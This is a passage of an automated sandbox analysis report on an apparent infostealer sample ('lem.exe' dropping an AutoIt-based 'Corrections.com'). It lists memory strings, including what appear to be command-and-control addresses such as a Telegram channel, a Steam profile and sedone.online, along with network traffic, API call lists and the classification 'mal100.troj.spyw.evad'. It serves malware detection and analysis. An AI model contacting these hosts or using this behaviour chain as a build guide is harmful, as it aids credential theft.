Source: Corrections.com, 0000000A.00000002.2823074845.0000000004C69000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sedone.online;
Source: Corrections.com, 0000000A.00000002.2823074845.0000000004C16000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sedone.onlineA1NY
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1926073805.0000000004550000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925711453.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819153926.0000000001B09000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2823074845.0000000004BE1000.00000040.00001000.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925550277.0000000001B25000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819810606.00000000044B2000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199807592927
Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0
Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Corrections.com, 0000000A.00000002.2820141571.0000000004556000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Corrections.com, 0000000A.00000002.2820141571.0000000004532000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Corrections.com, 0000000A.00000002.2820141571.0000000004556000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Corrections.com, 0000000A.00000002.2820141571.0000000004532000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.10.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Corrections.com, 0000000A.00000002.2819153926.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1924813167.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925875722.0000000001BA9000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925133553.00000000044BC000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925411138.000000000468C000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925795153.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925605271.000000000468C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1926073805.0000000004550000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925711453.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819153926.0000000001B09000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2823074845.0000000004C3A000.00000040.00001000.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2823074845.0000000004BE1000.00000040.00001000.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925550277.0000000001B25000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819810606.00000000044B2000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/detct0r
Source: Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/detct0rP
Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/detct0rd0wntgMozilla/5.0
Source: Corrections.com, 0000000A.00000002.2819153926.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/z
Source: Corrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2823074845.0000000004C3A000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Corrections.com.1.dr, Colonial.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Colonial.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000000F.00000003.2121171342.0000413000EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: Corrections.com, 0000000A.00000002.2819810606.000000000451C000.00000004.00000800.00020000.00000000.sdmp, 3ECTJM.10.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 0000000F.00000003.2160110362.00004130029C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 0000000F.00000003.2143311291.0000413000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000000F.00000003.2166777745.00004130030E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176624553.0000413003028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2169606836.0000413003058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.kK1dM3um3so.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 0000000F.00000003.2176418427.000041300300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2166733117.0000413002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Corrections.com, 0000000A.00000002.2824077438.0000000006B4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.12.241:443 -> 192.168.2.4:49740 version: TLS 1.2

Source: C:\Users\user\Desktop\lem.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0099F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

10_2_0099F7C7

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0099F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

10_2_0099F55C

Source: C:\Users\user\Desktop\lem.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_009B9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

10_2_009B9FD2

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_00994763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

10_2_00994763

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_00981B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

10_2_00981B4D

Source: C:\Users\user\Desktop\lem.exe	Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		0_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0098F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		10_2_0098F20D

Source: C:\Users\user\Desktop\lem.exe	File created: C:\Windows\FocusingPlayer	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	File created: C:\Windows\MasterCostume	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	File created: C:\Windows\CompletionAnimation	Jump to behavior

Source: C:\Users\user\Desktop\lem.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\lem.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\lem.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\lem.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00948017	10_2_00948017
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0092E1F0	10_2_0092E1F0
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0093E144	10_2_0093E144
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009422A2	10_2_009422A2
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009222AD	10_2_009222AD
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0095A26E	10_2_0095A26E
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0093C624	10_2_0093C624
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009AC8A4	10_2_009AC8A4
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0095E87F	10_2_0095E87F
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00956ADE	10_2_00956ADE
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00992A05	10_2_00992A05
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00988BFF	10_2_00988BFF
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0093CD7A	10_2_0093CD7A
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_0094CE10	10_2_0094CE10
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00957159	10_2_00957159
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00929240	10_2_00929240
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009B5311	10_2_009B5311
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_009296E0	10_2_009296E0
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00941704	10_2_00941704
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00941A76	10_2_00941A76
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00947B8B	10_2_00947B8B
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00929B60	10_2_00929B60
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00947DBA	10_2_00947DBA
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00941D20	10_2_00941D20
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00941FE7	10_2_00941FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\628056\Corrections.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: String function: 00940DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: String function: 0093FD52 appears 40 times
Source: C:\Users\user\Desktop\lem.exe	Code function: String function: 004062CF appears 57 times

Source: lem.exe

Static PE information: invalid certificate

Source: lem.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: TR9Z5X.10.dr

Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@44/48@5/6

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_009941FA GetLastError,FormatMessageW,

10_2_009941FA

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00982010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		10_2_00982010
Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Code function: 10_2_00981A0B AdjustTokenPrivileges,CloseHandle,		10_2_00981A0B

Source: C:\Users\user\Desktop\lem.exe

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_0098DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

10_2_0098DD87

Source: C:\Users\user\Desktop\lem.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Code function: 10_2_00993A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

10_2_00993A0E

Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\YZPV0N3M.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03

Source: C:\Users\user\Desktop\lem.exe

File created: C:\Users\user\AppData\Local\Temp\nss945C.tmp

Jump to behavior

Source: lem.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\lem.exe

